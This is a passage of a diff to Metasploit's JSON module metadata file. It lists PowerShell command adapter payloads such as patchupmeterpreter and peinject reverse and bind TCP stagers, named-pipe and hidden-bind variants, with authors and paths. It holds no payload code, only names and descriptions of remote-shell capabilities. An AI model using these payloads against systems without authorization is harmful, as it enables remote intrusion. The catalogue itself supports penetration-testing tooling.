"needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/find_tag", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/findtag_ord" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/reverse_ipv6_tcp": { + "name": "Powershell Exec, Reverse TCP Stager (IPv6)", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "hdm ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/reverse_ipv6_tcp", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/reverse_nonx_tcp": { + "name": "Powershell Exec, Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/reverse_nonx_tcp", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/reverse_ord_tcp": { + "name": "Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "spoonm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/reverse_ord_tcp", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/reverse_tcp": { + "name": "Powershell Exec, Reverse TCP Stager", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "hdm ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/reverse_tcp", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_tcp" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/reverse_tcp_allports": { + "name": "Powershell Exec, Reverse All-Port TCP Stager", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "hdm ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/reverse_tcp_allports", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/reverse_tcp_dns": { + "name": "Powershell Exec, Reverse TCP Stager (DNS)", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "hdm ", + "sf ", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/reverse_tcp_dns", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4": { + "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "hdm ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4_dns": { + "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "hdm ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/reverse_tcp_rc4_dns", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/reverse_tcp_uuid": { + "name": "Powershell Exec, Reverse TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_cmd/windows/powershell/peinject/bind_hidden_ipknock_tcp": { + "name": "Powershell Exec, Hidden Bind Ipknock TCP Stager", + "fullname": "payload/cmd/windows/powershell/peinject/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-https://github.com/EgeBalci/Amber", + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/bind_hidden_ipknock_tcp", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_cmd/windows/powershell/peinject/bind_hidden_tcp": { + "name": "Powershell Exec, Hidden Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/peinject/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-https://github.com/EgeBalci/Amber", + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/bind_hidden_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/bind_hidden_tcp", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_cmd/windows/powershell/peinject/bind_ipv6_tcp": { + "name": "Powershell Exec, Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/peinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_cmd/windows/powershell/peinject/bind_ipv6_tcp_uuid": { + "name": "Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/peinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/powershell/peinject/bind_named_pipe": { + "name": "Powershell Exec, Windows x86 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/powershell/peinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "UserExistsError" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/bind_named_pipe", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_cmd/windows/powershell/peinject/bind_nonx_tcp": { + "name": "Powershell Exec, Bind TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/peinject/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/bind_nonx_tcp", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_cmd/windows/powershell/peinject/bind_tcp": { + "name": "Powershell Exec, Bind TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/peinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/bind_tcp", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_tcp" + }, + "payload_cmd/windows/powershell/peinject/bind_tcp_rc4": { + "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/peinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_cmd/windows/powershell/peinject/bind_tcp_uuid": { + "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/peinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_cmd/windows/powershell/peinject/find_tag": { + "name": "Powershell Exec, Find Tag Ordinal Stager", + "fullname": "payload/cmd/windows/powershell/peinject/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/find_tag", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/findtag_ord" + }, + "payload_cmd/windows/powershell/peinject/reverse_ipv6_tcp": { + "name": "Powershell Exec, Reverse TCP Stager (IPv6)", + "fullname": "payload/cmd/windows/powershell/peinject/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/reverse_ipv6_tcp", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_cmd/windows/powershell/peinject/reverse_named_pipe": { + "name": "Powershell Exec, Windows x86 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/powershell/peinject/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_named_pipe" + }, + "payload_cmd/windows/powershell/peinject/reverse_nonx_tcp": { + "name": "Powershell Exec, Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/peinject/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/reverse_nonx_tcp", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_cmd/windows/powershell/peinject/reverse_ord_tcp": { + "name": "Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/peinject/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "spoonm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/reverse_ord_tcp", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_cmd/windows/powershell/peinject/reverse_tcp": { + "name": "Powershell Exec, Reverse TCP Stager", + "fullname": "payload/cmd/windows/powershell/peinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/reverse_tcp", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_tcp" + }, + "payload_cmd/windows/powershell/peinject/reverse_tcp_allports": { + "name": "Powershell Exec, Reverse All-Port TCP Stager", + "fullname": "payload/cmd/windows/powershell/peinject/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/peinject/reverse_tcp_allports", + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_cmd/windows/powershell/peinject/reverse_tcp_dns": { + "name": "Powershell Exec, Reverse TCP Stager (DNS)", + "fullname": "payload/cmd/windows/powershell/peinject/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf ", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via 